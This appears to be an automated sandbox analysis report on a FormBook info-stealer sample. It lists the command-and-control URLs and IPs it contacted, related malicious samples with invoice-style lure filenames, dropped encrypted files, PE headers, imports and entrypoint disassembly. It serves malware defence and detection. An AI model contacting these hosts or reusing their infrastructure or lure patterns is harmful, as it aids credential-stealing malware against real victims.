http://www.newbh.pro/fpja/?9F=IUuWDP5KSR42idQ8XdSlo3kXCFzmA+zBaCctSylP56Crxmno30P/P9QjtU4p0BAyo+b46pZB1tLFie03XqTXcxME3uJuUkrEHMOi0EZXDVBAbjQv6uRKQsMrbusrwUvwXjFI0Eut13DQ&wtE0B=1LjxZz	true	Avira URL Cloud: safe	unknown
http://www.fzmmkj.shop/okq9/?wtE0B=1LjxZz&9F=PI8q+JzCRiOLWB34dIea6eHgxdHcHle1WGGbYrpy5vcnpPBpYhW1E+E28c0ZH40azQD/W5sl2JWCO69xdVXiEbuzBudp5nCUhGIegbiFnEWG6GstFFRY+32jX4CHZZoFFrpuAXy7pwuQ	true	Avira URL Cloud: safe	unknown
http://www.thinkone.xyz/b0aw/	true	Avira URL Cloud: safe	unknown
http://www.l03678.xyz/798t/?9F=yTUzEcgndw7KboVFHT9arl6MXaU44mjtDVZL03kfN2SLXi32Rry3GMticKdTmzUGS/LvnIcIaX/Cuqcp6D2L1KHgDhjkH8i+BogGG+P5HmtoXOiMf53XRo99vMLso5GtXZXy7Rd2RFdT&wtE0B=1LjxZz	true	Avira URL Cloud: safe	unknown
http://www.einpisalpace.shop/8g74/?wtE0B=1LjxZz&9F=WJ/rFpSuW7SUTonvHlYgJHet70+40/nSG+S456FFT70GKpWTD+yYW7KPXc3l6inPZ41lXlQU44ttBNcSIyPO/Awb2QEZq+eieNEXwOjUfdTJHvICblirwfj54bAbpLWz76fPuJmn0JFO	true	Avira URL Cloud: safe	unknown
http://www.gern.dev/xbnt/	true	Avira URL Cloud: safe	unknown
http://www.aihuzhibo.net/lkpz/	true	Avira URL Cloud: safe	unknown
http://www.l03678.xyz/798t/	true	Avira URL Cloud: safe	unknown
http://www.givvjn.info/wl3x/	true	Avira URL Cloud: safe	unknown
http://www.givvjn.info/wl3x/?9F=IDH/sxYsqLulkbctqSbdtx5w6svLFYBpNQ4SjbhBVw1Jeu7sJntH54CcC3lqE89WX7ek1cbvwkrNRP5o0zeIvIpAz78Fkv0uY+bcXdYna/YYRI4X4Lt1dDHtrJaiCZnHtgyfQjAASlTW&wtE0B=1LjxZz	true	Avira URL Cloud: safe	unknown
http://www.mraber.dev/ixqi/	true	Avira URL Cloud: safe	unknown
http://www.einpisalpace.shop/8g74/	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	relog.exe, 00000006.00000002.3149681655.00000000074F6000.00000004.00000020.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	relog.exe, 00000006.00000002.3149681655.00000000074F6000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	relog.exe, 00000006.00000002.3149681655.00000000074F6000.00000004.00000020.00020000.00000000.sdmp	false		high
https://duckduckgo.com/?q=	relog.exe, 00000006.00000002.3149681655.00000000074F6000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.linkdex.com/bots/)	firefox.exe, 00000009.00000002.1938545616.000002586EACA000.00000040.80000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	relog.exe, 00000006.00000002.3149681655.00000000074F6000.00000004.00000020.00020000.00000000.sdmp	false		high
http://einpisalpace.shop/	fIydfvfomIEE.exe, 00000007.00000002.3147393601.0000000004210000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.aihuzhibo.net	fIydfvfomIEE.exe, 00000007.00000002.3149335657.0000000005981000.00000040.80000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ac.ecosia.org/autocomplete?q=	relog.exe, 00000006.00000002.3149681655.00000000074F6000.00000004.00000020.00020000.00000000.sdmp	false		high
https://wx.longwaysun.com/app/register.php?site_id=2239&topId=62128/798t/	relog.exe, 00000006.00000002.3147754299.0000000004506000.00000004.10000000.00040000.00000000.sdmp, fIydfvfomIEE.exe, 00000007.00000002.3147393601.00000000046C6000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	relog.exe, 00000006.00000002.3149681655.00000000074F6000.00000004.00000020.00020000.00000000.sdmp	false		high
https://wx.longwaysun.com/app/register.php?site_id=2239&topId=62128/798t/	relog.exe, 00000006.00000002.3147754299.0000000004506000.00000004.10000000.00040000.00000000.sdmp, fIydfvfomIEE.exe, 00000007.00000002.3147393601.00000000046C6000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	relog.exe, 00000006.00000002.3149681655.00000000074F6000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.newbh.pro/fpja/	fIydfvfomIEE.exe, 00000007.00000002.3147393601.0000000003D5A000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
176.57.65.76	www.newbh.pro	Bosnia and Herzegowina	47959	TELINEABA	true
18.163.74.139	www.fzmmkj.shop	United States	16509	AMAZON-02US	true
47.83.1.90	www.aoivej.info	United States	3209	VODANETInternationalIP-BackboneofVodafoneDE	true
209.74.79.41	www.thinkone.xyz	United States	31744	MULTIBAND-NEWHOPEUS	true
188.114.96.3	www.einpisalpace.shop	European Union	13335	CLOUDFLARENETUS	true
192.186.58.31	www.aihuzhibo.net	United States	132721	PING-GLOBAL-ASPingGlobalAmsterdamPOPASNNL	true
185.151.30.223	www.gern.dev	United Kingdom	48254	TWENTYIGB	true
162.218.30.235	www.l03678.xyz	United States	62587	ANT-CLOUDUS	true
46.38.243.234	mraber.dev	Germany	197540	NETCUP-ASnetcupGmbHDE	true

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1588389
Start date and time:	2025-01-11 01:53:01 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 10m 11s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name:	Run with higher sleep bypass
Number of analysed new started processes analysed:	12
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	2
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	XeFYBYYj0w.exe renamed because original name is a hash value
Original Sample Name:	2e2cbed55b8cf302b251ba867b7d438e286ae823dd9cda646f4996bc07c4e896.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@7/3@11/9
EGA Information:	Successful, ratio: 75%
HCA Information:	Successful, ratio: 91% Number of executed functions: 52 Number of non-executed functions: 267
Cookbook Comments:	Found application associated with file extension: .exe Sleeps bigger than 100000000ms are automatically reduced to 1000ms Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 13.107.246.45, 172.202.163.200
Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing disassembly code.

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
176.57.65.76	J1VpshZJfm.exe	Get hash	malicious	FormBook	Browse	www.newbh.pro/z9pt/
47.83.1.90	FG5wHs4fVX.exe	Get hash	malicious	FormBook	Browse	www.cloijz.info/r4db/
	KcSzB2IpP5.exe	Get hash	malicious	FormBook	Browse	www.ripbgs.info/mheu/?SDC=9Pe/ezeaWCrzUAPBTcNIGLUigJjsMNJlR4gH1LxCPe/+YeL0Jf302cRtfT27tJhwI3isQtUK9KovoI0NPjbFDyYPKZnOU02C1XybnvkdM/orYwcMtw==&mH=CpePy0P
	smQoKNkwB7.exe	Get hash	malicious	FormBook	Browse	www.cloijz.info/r4db/
	1162-201.exe	Get hash	malicious	FormBook	Browse	www.ripbgs.info/hf4a/
	QUOTATION#050125.exe	Get hash	malicious	FormBook	Browse	www.givvjn.info/nkmx/
	QUOTATION#070125-ELITE MARINE .exe	Get hash	malicious	FormBook	Browse	www.givvjn.info/nkmx/
	QUOTATION#050125.exe	Get hash	malicious	FormBook	Browse	www.givvjn.info/nkmx/
	ORDER REF 47896798 PSMCO.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	www.cruycq.info/6jon/
	DHL DOCS 2-0106-25.exe	Get hash	malicious	FormBook	Browse	www.cruycq.info/mywm/
	Order Inquiry.exe	Get hash	malicious	FormBook	Browse	www.adadev.info/ctdy/
209.74.79.41	9MZZG92yMO.exe	Get hash	malicious	FormBook	Browse	www.winningpath.xyz/4p8s/
	z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exe	Get hash	malicious	FormBook	Browse	www.daildeals.store/4der/
	ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exe	Get hash	malicious	FormBook	Browse	www.freshteps.life/qp01/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
www.aihuzhibo.net	ORDER REF 47896798 PSMCO.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	192.186.58.31
www.aihuzhibo.net	rQuotation.exe	Get hash	malicious	FormBook	Browse	192.186.58.31
www.gern.dev	J1VpshZJfm.exe	Get hash	malicious	FormBook	Browse	185.151.30.223
www.givvjn.info	QUOTATION#050125.exe	Get hash	malicious	FormBook	Browse	47.83.1.90
	QUOTATION#070125-ELITE MARINE .exe	Get hash	malicious	FormBook	Browse	47.83.1.90
	QUOTATION#050125.exe	Get hash	malicious	FormBook	Browse	47.83.1.90
www.einpisalpace.shop	gH3LlhcRzg.exe	Get hash	malicious	FormBook	Browse	188.114.97.3
www.einpisalpace.shop	1162-201.exe	Get hash	malicious	FormBook	Browse	188.114.96.3
www.newbh.pro	J1VpshZJfm.exe	Get hash	malicious	FormBook	Browse	176.57.65.76

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
AMAZON-02US	http://www.jadavisinjurylawyers.com/	Get hash	malicious	Unknown	Browse	54.231.128.160
	uG3I84bQEr.exe	Get hash	malicious	FormBook	Browse	18.141.10.107
	https://noiclethomas.wixsite.com/rice	Get hash	malicious	Unknown	Browse	99.86.4.105
	phish_alert_sp2_2.0.0.0(4).eml	Get hash	malicious	Unknown	Browse	108.128.172.10
	https://app.online.mt.com/e/es?s=961579678&e=14507707&elqTrackId=4f40dcb3a3854013ad3a46d461cc3aff&elq=5140e028df1a42afab491350388fd129&elqaid=221811&elqat=1&elqcst=272&elqcsid=2325629&elqak=8AF5D97DFF9E423CC7C7524F5CA3C1A86F5F67341B9DF612D5A2FB20DE928F2AA351	Get hash	malicious	Unknown	Browse	52.208.198.158
	https://app.online.mt.com/e/es?s=961579678&e=14507707&elqTrackId=4f40dcb3a3854013ad3a46d461cc3aff&elq=5140e028df1a42afab491350388fd129&elqaid=221811&elqat=1&elqcst=272&elqcsid=2325629&elqak=8AF5D97DFF9E423CC7C7524F5CA3C1A86F5F67341B9DF612D5A2FB20DE928F2AA351	Get hash	malicious	Unknown	Browse	13.32.110.93
	https://maya-lopez.filemail.com/t/XhcWEjoR	Get hash	malicious	Unknown	Browse	108.138.26.78
	25IvlOVEB1.exe	Get hash	malicious	FormBook	Browse	13.248.169.48
	LiuUGJK9vH.exe	Get hash	malicious	FormBook	Browse	18.141.10.107
	5CTbduoXq4.exe	Get hash	malicious	FormBook	Browse	13.228.81.39
VODANETInternationalIP-BackboneofVodafoneDE	6.elf	Get hash	malicious	Unknown	Browse	82.82.131.16
	FG5wHs4fVX.exe	Get hash	malicious	FormBook	Browse	47.83.1.90
	KcSzB2IpP5.exe	Get hash	malicious	FormBook	Browse	47.83.1.90
	smQoKNkwB7.exe	Get hash	malicious	FormBook	Browse	47.83.1.90
	1162-201.exe	Get hash	malicious	FormBook	Browse	47.83.1.90
	5.elf	Get hash	malicious	Unknown	Browse	88.79.50.180
	6.elf	Get hash	malicious	Unknown	Browse	178.10.231.77
	armv4l.elf	Get hash	malicious	Unknown	Browse	88.68.235.154
	Fantazy.sh4.elf	Get hash	malicious	Unknown	Browse	188.101.106.73
	Fantazy.i486.elf	Get hash	malicious	Unknown	Browse	188.97.99.47
TELINEABA	J1VpshZJfm.exe	Get hash	malicious	FormBook	Browse	176.57.65.76
	belks.arm.elf	Get hash	malicious	Mirai	Browse	88.214.61.247
	belks.mpsl.elf	Get hash	malicious	Mirai	Browse	88.214.61.239
	na.elf	Get hash	malicious	Mirai	Browse	88.214.61.214
	ImBm40hNZ2.exe	Get hash	malicious	FormBook, GuLoader	Browse	176.57.64.102
	220204-TF1--00.exe	Get hash	malicious	FormBook	Browse	176.57.64.102
	20-EM-00- PI-INQ-3001.exe	Get hash	malicious	FormBook	Browse	176.57.64.102
	RFQ STR-160-01.exe	Get hash	malicious	FormBook	Browse	176.57.64.102
	#U5831#U50f9#U8acb#U6c42 - #U6a23#U672c#U76ee#U9304.vbs	Get hash	malicious	FormBook, GuLoader	Browse	176.57.64.102
	031215-Revised-01.exe	Get hash	malicious	FormBook	Browse	176.57.64.102

Process:	C:\Windows\SysWOW64\relog.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
Category:	modified
Size (bytes):	196608
Entropy (8bit):	1.1215420383712111
Encrypted:	false
SSDEEP:	384:r2qOB1nxCkvSAELyKOMq+8HKkjucswRv8p3:aq+n0E9ELyKOMq+8HKkjuczRv89
MD5:	9A809AD8B1FDDA60760BB6253358A1DB
SHA1:	D7BBC6B5EF1ACF8875B36DEA141C9911BADF9F66
SHA-256:	95756B4CE2E462117AF93FE5E35AD0810993D31CC6666B399BEE3B336A63219A
SHA-512:	2680CEAA75837E374C4FB28B7A0CD1F699F2DAAE7BFB895A57FDB8D9727A83EF821F2B75B91CB53E00B75468F37DC3009582FC54F5D07B2B62F3026B0185FF73
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\aut22C2.tmp

Download File

Process:	C:\Users\user\Desktop\XeFYBYYj0w.exe
File Type:	data
Category:	dropped
Size (bytes):	287232
Entropy (8bit):	7.994402003516092
Encrypted:	true
SSDEEP:	6144:hu4EXGNvjWz2L6whHymX/8eYJwsQqYtSQ0QOs:heXGNv4pwHymP8eNVq8f03s
MD5:	E0CBAA9FD890C71AD55D046177FAB608
SHA1:	424AE46DFB188F63584F06BBA3FE54C32CF0A536
SHA-256:	FC6CCC0B38BA6F040793B41DE1BD8833947B75B4CFD32F7D22E61F4901E65F3E
SHA-512:	3AEA9226616FBD081A0498A383DD8EE567E55F2F46907BB548C222550FC5645055BCE5FA3940A3A20519AB6A87801BA987761DEEE10BF7F5A88D66E18E326648
Malicious:	false
Reputation:	low
Preview:	...CJGSR68PG..MF.5TRGUCI.SR28PGZYMFE5TRGUCIGSR28PGZYMFE5TRGU.IGS\-.^G.P.g.4..f.+ 4s"@W75;4m%$[:=3u!,g!'\.9)z...eX;6"{NDMwR28PGZY4GL.i2 .~) .oR_.]..\|%R.H...u'4.(...f9*..\7:z5$.GSR28PGZ..FEyUSG...'SR28PGZY.FG4_SLUC.CSR28PGZYMFQ5TRWUCI'WR28.GZIMFE7TRAUCIGSR2>PGZYMFE54VGUAIGSR28RG..MFU5TBGUCIWSR"8PGZYMVE5TRGUCIGSR28PGZYMFE5TRGUCIGSR28PGZYMFE5TRGUCIGSR28PGZYMFE5TRGUCIGSR28PGZYMFE5TRGUCIGSR28PGZYMFE5TRGUCIGSR28PGZYMFE5TRGUCIGSR28PGZYc2 M RGU..CSR"8PG.]MFU5TRGUCIGSR28PGzYM&E5TRGUCIGSR28PGZYMFE5TRGUCIGSR28PGZYMFE5TRGUCIGSR28PGZYMFE5TRGUCIGSR28PGZYMFE5TRGUCIGSR28PGZYMFE5TRGUCIGSR28PGZYMFE5TRGUCIGSR28PGZYMFE5TRGUCIGSR28PGZYMFE5TRGUCIGSR28PGZYMFE5TRGUCIGSR28PGZYMFE5TRGUCIGSR28PGZYMFE5TRGUCIGSR28PGZYMFE5TRGUCIGSR28PGZYMFE5TRGUCIGSR28PGZYMFE5TRGUCIGSR28PGZYMFE5TRGUCIGSR28PGZYMFE5TRGUCIGSR28PGZYMFE5TRGUCIGSR28PGZYMFE5TRGUCIGSR28PGZYMFE5TRGUCIGSR28PGZYMFE5TRGUCIGSR28PGZYMFE5TRGUCIGSR28PGZYMFE5TRGUCIGSR28PGZYMFE5TRGUCIGSR28PGZYMFE5TRGUCIGSR28PGZYMFE5TRGUCIGSR28PGZYMFE5TRGUCIGSR28PGZYMFE5TRGUCIGSR28PG

C:\Users\user\AppData\Local\Temp\unrosined

Download File

Process:	C:\Users\user\Desktop\XeFYBYYj0w.exe
File Type:	data
Category:	modified
Size (bytes):	287232
Entropy (8bit):	7.994402003516092
Encrypted:	true
SSDEEP:	6144:hu4EXGNvjWz2L6whHymX/8eYJwsQqYtSQ0QOs:heXGNv4pwHymP8eNVq8f03s
MD5:	E0CBAA9FD890C71AD55D046177FAB608
SHA1:	424AE46DFB188F63584F06BBA3FE54C32CF0A536
SHA-256:	FC6CCC0B38BA6F040793B41DE1BD8833947B75B4CFD32F7D22E61F4901E65F3E
SHA-512:	3AEA9226616FBD081A0498A383DD8EE567E55F2F46907BB548C222550FC5645055BCE5FA3940A3A20519AB6A87801BA987761DEEE10BF7F5A88D66E18E326648
Malicious:	false
Preview:	...CJGSR68PG..MF.5TRGUCI.SR28PGZYMFE5TRGUCIGSR28PGZYMFE5TRGU.IGS\-.^G.P.g.4..f.+ 4s"@W75;4m%$[:=3u!,g!'\.9)z...eX;6"{NDMwR28PGZY4GL.i2 .~) .oR_.]..\|%R.H...u'4.(...f9*..\7:z5$.GSR28PGZ..FEyUSG...'SR28PGZY.FG4_SLUC.CSR28PGZYMFQ5TRWUCI'WR28.GZIMFE7TRAUCIGSR2>PGZYMFE54VGUAIGSR28RG..MFU5TBGUCIWSR"8PGZYMVE5TRGUCIGSR28PGZYMFE5TRGUCIGSR28PGZYMFE5TRGUCIGSR28PGZYMFE5TRGUCIGSR28PGZYMFE5TRGUCIGSR28PGZYMFE5TRGUCIGSR28PGZYMFE5TRGUCIGSR28PGZYc2 M RGU..CSR"8PG.]MFU5TRGUCIGSR28PGzYM&E5TRGUCIGSR28PGZYMFE5TRGUCIGSR28PGZYMFE5TRGUCIGSR28PGZYMFE5TRGUCIGSR28PGZYMFE5TRGUCIGSR28PGZYMFE5TRGUCIGSR28PGZYMFE5TRGUCIGSR28PGZYMFE5TRGUCIGSR28PGZYMFE5TRGUCIGSR28PGZYMFE5TRGUCIGSR28PGZYMFE5TRGUCIGSR28PGZYMFE5TRGUCIGSR28PGZYMFE5TRGUCIGSR28PGZYMFE5TRGUCIGSR28PGZYMFE5TRGUCIGSR28PGZYMFE5TRGUCIGSR28PGZYMFE5TRGUCIGSR28PGZYMFE5TRGUCIGSR28PGZYMFE5TRGUCIGSR28PGZYMFE5TRGUCIGSR28PGZYMFE5TRGUCIGSR28PGZYMFE5TRGUCIGSR28PGZYMFE5TRGUCIGSR28PGZYMFE5TRGUCIGSR28PGZYMFE5TRGUCIGSR28PGZYMFE5TRGUCIGSR28PGZYMFE5TRGUCIGSR28PGZYMFE5TRGUCIGSR28PG

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.0689320608094715
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	XeFYBYYj0w.exe
File size:	1'294'848 bytes
MD5:	ecb2719218ea0ad21c7d72a976cf69d2
SHA1:	91cfa0b33196cab05aa7c4bb5668c2dab332b62f
SHA256:	2e2cbed55b8cf302b251ba867b7d438e286ae823dd9cda646f4996bc07c4e896
SHA512:	e8e556851a15b5b2f1e38d94f50cd734dfca223422700e7d07969d86486f09194b756e0189c2c1e36c9d72de99e6e825e376870f932c03798716adab56915bb9
SSDEEP:	24576:Fu6J33O0c+JY5UZ+XC0kGso6FaqzUGlUrwmGoYEPDWY:Hu0c++OCvkGs9FaqzUYUMmGjY
TLSH:	E855CF22B3DDC360CB665173BF6AB7002E7B7C650530B41B2E983D7AB970261166DB63
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}..r}..r}..4,".p}......s}.../..A}.../#..}.../".G}..{.@.{}..{.P.W}..r}..R.....)."}......s}.../..s}..r}T.s}......s}..Richr}.

File Icon


Icon Hash:	1c4c898989a581ab

Static PE Info

General

Entrypoint:	0x427dcd
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x67523907 [Thu Dec 5 23:36:39 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	afcdf79be1557326c854b6e20cb900a7

Entrypoint Preview

Instruction
call 00007F2914B9081Ah
jmp 00007F2914B835E4h
int3
int3
int3
int3
int3
int3
int3
int3
int3
push edi
push esi
mov esi, dword ptr [esp+10h]
mov ecx, dword ptr [esp+14h]
mov edi, dword ptr [esp+0Ch]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe 00007F2914B8376Ah
cmp edi, eax
jc 00007F2914B83ACEh
bt dword ptr [004C31FCh], 01h
jnc 00007F2914B83769h
rep movsb
jmp 00007F2914B83A7Ch
cmp ecx, 00000080h
jc 00007F2914B83934h
mov eax, edi
xor eax, esi
test eax, 0000000Fh
jne 00007F2914B83770h
bt dword ptr [004BE324h], 01h
jc 00007F2914B83C40h
bt dword ptr [004C31FCh], 00000000h
jnc 00007F2914B8390Dh
test edi, 00000003h
jne 00007F2914B8391Eh
test esi, 00000003h
jne 00007F2914B838FDh
bt edi, 02h
jnc 00007F2914B8376Fh
mov eax, dword ptr [esi]
sub ecx, 04h
lea esi, dword ptr [esi+04h]
mov dword ptr [edi], eax
lea edi, dword ptr [edi+04h]
bt edi, 03h
jnc 00007F2914B83773h
movq xmm1, qword ptr [esi]
sub ecx, 08h
lea esi, dword ptr [esi+08h]
movq qword ptr [edi], xmm1
lea edi, dword ptr [edi+08h]
test esi, 00000007h
je 00007F2914B837C5h
bt esi, 03h
jnc 00007F2914B83818h

Rich Headers

Programming Language:

[ASM] VS2013 build 21005
[ C ] VS2013 build 21005
[C++] VS2013 build 21005
[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729
[ASM] VS2013 UPD4 build 31101
[RES] VS2013 build 21005
[LNK] VS2013 UPD4 build 31101

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xba44c	0x17c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xc7000	0x738d0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x13b000	0x711c	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x92bc0	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0xa4870	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8f000	0x884	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x8dcc4	0x8de00	d28a820a1d9ff26cda02d12b888ba4b4	False	0.5728679102422908	data	6.676118058520316	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8f000	0x2e10e	0x2e200	79b14b254506b0dbc8cd0ad67fb70ad9	False	0.33535526761517614	OpenPGP Public Key	5.76010872795207	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xbe000	0x8f74	0x5200	9f9d6f746f1a415a63de45f8b7983d33	False	0.1017530487804878	data	1.198745897703538	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0xc7000	0x738d0	0x73a00	70ac15a53118798ed1eddc1a9f990b36	False	0.8071938344594595	data	7.504892395251553	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x13b000	0x711c	0x7200	6fcae3cbbf6bfbabf5ec5bbe7cf612c3	False	0.7650767543859649	data	6.779031650454199	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0xc7458	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.7466216216216216
RT_ICON	0xc7580	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors	English	Great Britain	0.3277027027027027
RT_ICON	0xc76a8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.3885135135135135
RT_ICON	0xc77d0	0x16b70	Device independent bitmap graphic, 150 x 300 x 32, image size 90000	English	Great Britain	0.10503009458297506
RT_MENU	0xde340	0x50	data	English	Great Britain	0.9
RT_STRING	0xde390	0x594	data	English	Great Britain	0.3333333333333333
RT_STRING	0xde924	0x68a	data	English	Great Britain	0.2747909199522103
RT_STRING	0xdefb0	0x490	data	English	Great Britain	0.3715753424657534
RT_STRING	0xdf440	0x5fc	data	English	Great Britain	0.3087467362924282
RT_STRING	0xdfa3c	0x65c	data	English	Great Britain	0.34336609336609336
RT_STRING	0xe0098	0x466	data	English	Great Britain	0.3605683836589698
RT_STRING	0xe0500	0x158	Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0	English	Great Britain	0.502906976744186
RT_RCDATA	0xe0658	0x59d59	data			1.0003288391976324
RT_GROUP_ICON	0x13a3b4	0x14	data	English	Great Britain	1.25
RT_GROUP_ICON	0x13a3c8	0x14	data	English	Great Britain	1.25
RT_GROUP_ICON	0x13a3dc	0x14	data	English	Great Britain	1.15
RT_GROUP_ICON	0x13a3f0	0x14	data	English	Great Britain	1.25
RT_VERSION	0x13a404	0xdc	data	English	Great Britain	0.6181818181818182
RT_MANIFEST	0x13a4e0	0x3ef	ASCII text, with CRLF line terminators	English	Great Britain	0.5074478649453823

Imports

DLL	Import
WSOCK32.dll	WSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
VERSION.dll	GetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
WINMM.dll	timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll	ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
MPR.dll	WNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
WININET.dll	InternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
PSAPI.DLL	GetProcessMemoryInfo
IPHLPAPI.DLL	IcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
USERENV.dll	DestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
UxTheme.dll	IsThemeActive
